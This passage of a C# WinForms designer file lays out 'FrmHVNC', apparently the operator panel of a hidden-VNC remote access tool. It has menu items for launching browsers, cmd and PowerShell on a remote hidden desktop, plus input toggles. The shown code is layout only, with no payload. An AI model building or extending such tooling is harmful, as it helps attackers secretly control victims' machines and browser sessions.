            this.BrowserMenuToolStripMenuItem.Image = (Image)Resources.toolbox;
            this.BrowserMenuToolStripMenuItem.Name = "BrowserMenuToolStripMenuItem";
            this.BrowserMenuToolStripMenuItem.Size = new Size(180, 22);
            this.BrowserMenuToolStripMenuItem.Text = "Custom Browser";
            this.BrowserMenuToolStripMenuItem.Click += new EventHandler(this.BrowserMenuToolStripMenuItem_Click);
            this.ChromeToolStripMenuItem.BackColor = Color.FromArgb(58, 61, 76);
            this.ChromeToolStripMenuItem.ForeColor = Color.White;
            this.ChromeToolStripMenuItem.Image = (Image)Resources.Google_Chrome_icon;
            this.ChromeToolStripMenuItem.Name = "ChromeToolStripMenuItem";
            this.ChromeToolStripMenuItem.Size = new Size(180, 22);
            this.ChromeToolStripMenuItem.Text = "Chrome";
            this.ChromeToolStripMenuItem.Click += new EventHandler(this.ChromeToolStripMenuItem_Click);
            this.FirefoxToolStripMenuItem.BackColor = Color.FromArgb(58, 61, 76);
            this.FirefoxToolStripMenuItem.ForeColor = Color.White;
            this.FirefoxToolStripMenuItem.Image = (Image)Resources.Firefox_logo;
            this.FirefoxToolStripMenuItem.Name = "FirefoxToolStripMenuItem";
            this.FirefoxToolStripMenuItem.Size = new Size(180, 22);
            this.FirefoxToolStripMenuItem.Text = "Firefox";
            this.FirefoxToolStripMenuItem.Click += new EventHandler(this.FirefoxToolStripMenuItem_Click);
            this.EdgeToolStripMenuItem.BackColor = Color.FromArgb(58, 61, 76);
            this.EdgeToolStripMenuItem.ForeColor = Color.White;
            this.EdgeToolStripMenuItem.Image = (Image)Resources.edge;
            this.EdgeToolStripMenuItem.Name = "EdgeToolStripMenuItem";
            this.EdgeToolStripMenuItem.Size = new Size(180, 22);
            this.EdgeToolStripMenuItem.Text = "Edge";
            this.EdgeToolStripMenuItem.Click += new EventHandler(this.EdgeToolStripMenuItem_Click);
            this.OperaToolStripMenuItem.BackColor = Color.FromArgb(58, 61, 76);
            this.OperaToolStripMenuItem.ForeColor = Color.White;
            this.OperaToolStripMenuItem.Image = (Image)Resources.opera1;
            this.OperaToolStripMenuItem.Name = "OperaToolStripMenuItem";
            this.OperaToolStripMenuItem.Size = new Size(180, 22);
            this.OperaToolStripMenuItem.Text = "Opera";
            this.OperaToolStripMenuItem.Click += new EventHandler(this.OperaToolStripMenuItem_Click);
            this.OperaGxToolStripMenuItem.BackColor = Color.FromArgb(58, 61, 76);
            this.OperaGxToolStripMenuItem.ForeColor = Color.White;
            this.OperaGxToolStripMenuItem.Image = (Image)Resources.operagx1;
            this.OperaGxToolStripMenuItem.Name = "OperaGxToolStripMenuItem";
            this.OperaGxToolStripMenuItem.Size = new Size(180, 22);
            this.OperaGxToolStripMenuItem.Text = "OperaGX";
            this.OperaGxToolStripMenuItem.Click += new EventHandler(this.OperaGxToolStripMenuItem_Click);
            this.BraveToolStripMenuItem.BackColor = Color.FromArgb(58, 61, 76);
            this.BraveToolStripMenuItem.ForeColor = Color.White;
            this.BraveToolStripMenuItem.Image = (Image)Resources.Brave_icon_lionface;
            this.BraveToolStripMenuItem.Name = "BraveToolStripMenuItem";
            this.BraveToolStripMenuItem.Size = new Size(180, 22);
            this.BraveToolStripMenuItem.Text = "Brave";
            this.BraveToolStripMenuItem.Click += new EventHandler(this.BraveToolStripMenuItem_Click);
            this.CmdToolStripMenuItem.BackColor = Color.FromArgb(58, 61, 76);
            this.CmdToolStripMenuItem.ForeColor = Color.White;
            this.CmdToolStripMenuItem.Image = (Image)Resources.CMDIcon;
            this.CmdToolStripMenuItem.Name = "CmdToolStripMenuItem";
            this.CmdToolStripMenuItem.Size = new Size(180, 22);
            this.CmdToolStripMenuItem.Text = "Command Prompt";
            this.CmdToolStripMenuItem.Click += new EventHandler(this.CmdToolStripMenuItem_Click);
            this.PowershellToolStripMenuItem.BackColor = Color.FromArgb(58, 61, 76);
            this.PowershellToolStripMenuItem.ForeColor = Color.White;
            this.PowershellToolStripMenuItem.Image = (Image)Resources.powershellicon;
            this.PowershellToolStripMenuItem.Name = "PowershellToolStripMenuItem";
            this.PowershellToolStripMenuItem.Size = new Size(180, 22);
            this.PowershellToolStripMenuItem.Text = "Powershell";
            this.PowershellToolStripMenuItem.Click += new EventHandler(this.PowershellToolStripMenuItem_Click);
            this.btnShow.Animated = true;
            this.btnShow.BackColor = Color.FromArgb(62, 72, 88);
            this.btnShow.BorderColor = Color.FromArgb(72, 82, 98);
            this.btnShow.BorderRadius = 2;
            this.btnShow.BorderThickness = 1;
            this.btnShow.DisabledState.BorderColor = Color.DarkGray;
            this.btnShow.DisabledState.CustomBorderColor = Color.DarkGray;
            this.btnShow.DisabledState.FillColor = Color.FromArgb(169, 169, 169);
            this.btnShow.DisabledState.FillColor2 = Color.FromArgb(169, 169, 169);
            this.btnShow.DisabledState.ForeColor = Color.FromArgb(141, 141, 141);
            this.btnShow.FillColor = Color.FromArgb(35, 35, 35);
            this.btnShow.FillColor2 = Color.FromArgb(62, 72, 88);
            this.btnShow.Font = new Font("Segoe UI", 8.25f);
            this.btnShow.ForeColor = Color.White;
            this.btnShow.GradientMode = LinearGradientMode.ForwardDiagonal;
            this.btnShow.Image = (Image)Resources.arrow_down;
            this.btnShow.ImageSize = new Size(16, 16);
            this.btnShow.Location = new Point(0, 0);
            this.btnShow.Name = "btnShow";
            this.btnShow.Size = new Size(70, 19);
            this.btnShow.TabIndex = 33;
            this.btnShow.Text = "Show";
            this.btnShow.Visible = false;
            this.btnShow.Click += new EventHandler(this.btnShow_Click);
            this.btnExit.Animated = true;
            this.btnExit.BackColor = Color.FromArgb(62, 72, 88);
            this.btnExit.BorderColor = Color.FromArgb(72, 82, 98);
            this.btnExit.BorderRadius = 2;
            this.btnExit.BorderThickness = 1;
            this.btnExit.DisabledState.BorderColor = Color.DarkGray;
            this.btnExit.DisabledState.CustomBorderColor = Color.DarkGray;
            this.btnExit.DisabledState.FillColor = Color.FromArgb(169, 169, 169);
            this.btnExit.DisabledState.FillColor2 = Color.FromArgb(169, 169, 169);
            this.btnExit.DisabledState.ForeColor = Color.FromArgb(141, 141, 141);
            this.btnExit.FillColor = Color.FromArgb(35, 35, 35);
            this.btnExit.FillColor2 = Color.FromArgb(62, 72, 88);
            this.btnExit.Font = new Font("Segoe UI", 8.25f);
            this.btnExit.ForeColor = Color.White;
            this.btnExit.GradientMode = LinearGradientMode.ForwardDiagonal;
            this.btnExit.Image = (Image)Resources.arrow_in;
            this.btnExit.ImageSize = new Size(16, 16);
            this.btnExit.Location = new Point(329, 37);
            this.btnExit.Name = "btnExit";
            this.btnExit.Size = new Size(70, 19);
            this.btnExit.TabIndex = 41;
            this.btnExit.Text = "Exit";
            this.btnExit.Visible = false;
            this.btnExit.Click += new EventHandler(this.btnExit_Click);
            this.guna2Elipse1.BorderRadius = 2;
            this.guna2Elipse1.TargetControl = (Control)this.GraphicPictureBox;
            this.PluginLabel.Anchor = AnchorStyles.Top | AnchorStyles.Right;
            this.PluginLabel.AutoSize = true;
            this.PluginLabel.BackColor = Color.Black;
            this.PluginLabel.ForeColor = Color.OrangeRed;
            this.PluginLabel.Location = new Point(292, 80);
            this.PluginLabel.Name = "PluginLabel";
            this.PluginLabel.Size = new Size(167, 13);
            this.PluginLabel.TabIndex = 42;
            this.PluginLabel.Text = "Checking if Module is loaded...";
            this.hvncPictureBox1._enableKeyboardInput = false;
            this.hvncPictureBox1._enableMouseInput = false;
            this.hvncPictureBox1.BackColor = SystemColors.Desktop;
            this.hvncPictureBox1.BorderStyle = BorderStyle.FixedSingle;
            this.hvncPictureBox1.CapFPS = false;
            this.hvncPictureBox1.Dock = DockStyle.Fill;
            this.hvncPictureBox1.GetImageSafe = (Image)null;
            this.hvncPictureBox1.Location = new Point(0, 36);
            this.hvncPictureBox1.Name = "hvncPictureBox1";
            this.hvncPictureBox1.Running = false;
            this.hvncPictureBox1.Size = new Size(755, 514);
            this.hvncPictureBox1.SizeMode = PictureBoxSizeMode.StretchImage;
            this.hvncPictureBox1.TabIndex = 9;
            this.hvncPictureBox1.TabStop = false;
            this.AutoScaleDimensions = new SizeF(96f, 96f);
            this.AutoScaleMode = AutoScaleMode.Dpi;
            this.ClientSize = new Size(755, 550);
            this.Controls.Add((Control)this.PluginLabel);
            this.Controls.Add((Control)this.btnExit);
            this.Controls.Add((Control)this.btnShow);
            this.Controls.Add((Control)this.hvncPictureBox1);
            this.Controls.Add((Control)this.panelTop);
            this.Font = new Font("Segoe UI", 8.25f, FontStyle.Regular, GraphicsUnit.Point, (byte)0);
            this.Icon = (Icon)resources.GetObject("$this.Icon");
            this.KeyPreview = true;
            this.MinimumSize = new Size(771, 589);
            this.Name = "FrmHVNC";
            this.StartPosition = FormStartPosition.CenterScreen;
            this.Text = "HVNC []";
            this.FormClosing += new FormClosingEventHandler(this.FrmHVNC_FormClosing);
            this.Load += new EventHandler(this.FrmHVNC_Load);
            this.Resize += new EventHandler(this.FrmHVNC_Resize);
            this.ExtrasContextMenuStrip.ResumeLayout(false);
            this.panelTop.ResumeLayout(false);
            this.panelTop.PerformLayout();
            ((ISupportInitialize)this.GraphicPictureBox).EndInit();
            this.ProgramsContextMenuStrip.ResumeLayout(false);
            ((ISupportInitialize)this.hvncPictureBox1).EndInit();
            this.ResumeLayout(false);
            this.PerformLayout();
        }

        private Label lblQuality;
        private Label lblQualityShow;
        private ToolTip toolTipButtons;
        private hvncPictureBox hvncPictureBox1;
        private Guna2ContextMenuStrip ExtrasContextMenuStrip;
        private ToolStripMenuItem ResetAllWindowsToolStripMenuItem;
        private Guna2GradientPanel panelTop;
        private Guna2GradientButton btnStart;
        private Guna2GradientButton ExplorerBtn;
        private Guna2GradientButton ProgramsListBtn;
        private Guna2ContextMenuStrip ProgramsContextMenuStrip;
        private ToolStripMenuItem ChromeToolStripMenuItem;
        private ToolStripMenuItem FirefoxToolStripMenuItem;
        private ToolStripMenuItem EdgeToolStripMenuItem;
        private ToolStripMenuItem BraveToolStripMenuItem;
        private ToolStripMenuItem CmdToolStripMenuItem;
        private ToolStripMenuItem PowershellToolStripMenuItem;
        private Guna2GradientButton ExtrasBtn;
        private Guna2CheckBox AutoExplorerCheckbox;
        private ToolStripMenuItem pasteToolStripMenuItem;
        private ToolStripMenuItem killExplorerToolStripMenuItem;
        private Guna2GradientButton btnShow;
        private Guna2GradientButton btnStop;
        private ToolStripMenuItem clientPasteToolStripMenuItem;
        private Guna2GradientButton btnMouse;
        private Guna2GradientButton btnKeyboard;
        private KryptonPalette TrackBarPalette;
        private KryptonTrackBar barQuality;
        private ToolStripMenuItem fullScreenToolStripMenuItem;
        private Guna2GradientButton btnExit;
        private Guna2PictureBox GraphicPictureBox;
        private Guna2Elipse guna2Elipse1;
        private ToolStripMenuItem hideToolStripMenuItem;
        private Label PluginLabel;
        private Label SizeLabel;
        private ToolStripMenuItem CapFPSToolStripMenuItem;
        private Label WindowLabel;
        private ToolStripMenuItem OldGraphicsEngineToolStripMenuItem;
        private ToolStripMenuItem FixOperaGXToolStripMenuItem;
        private ToolStripMenuItem BrowserMenuToolStripMenuItem;
        private ToolStripMenuItem OperaToolStripMenuItem;
        private ToolStripMenuItem OperaGxToolStripMenuItem;
    }
}
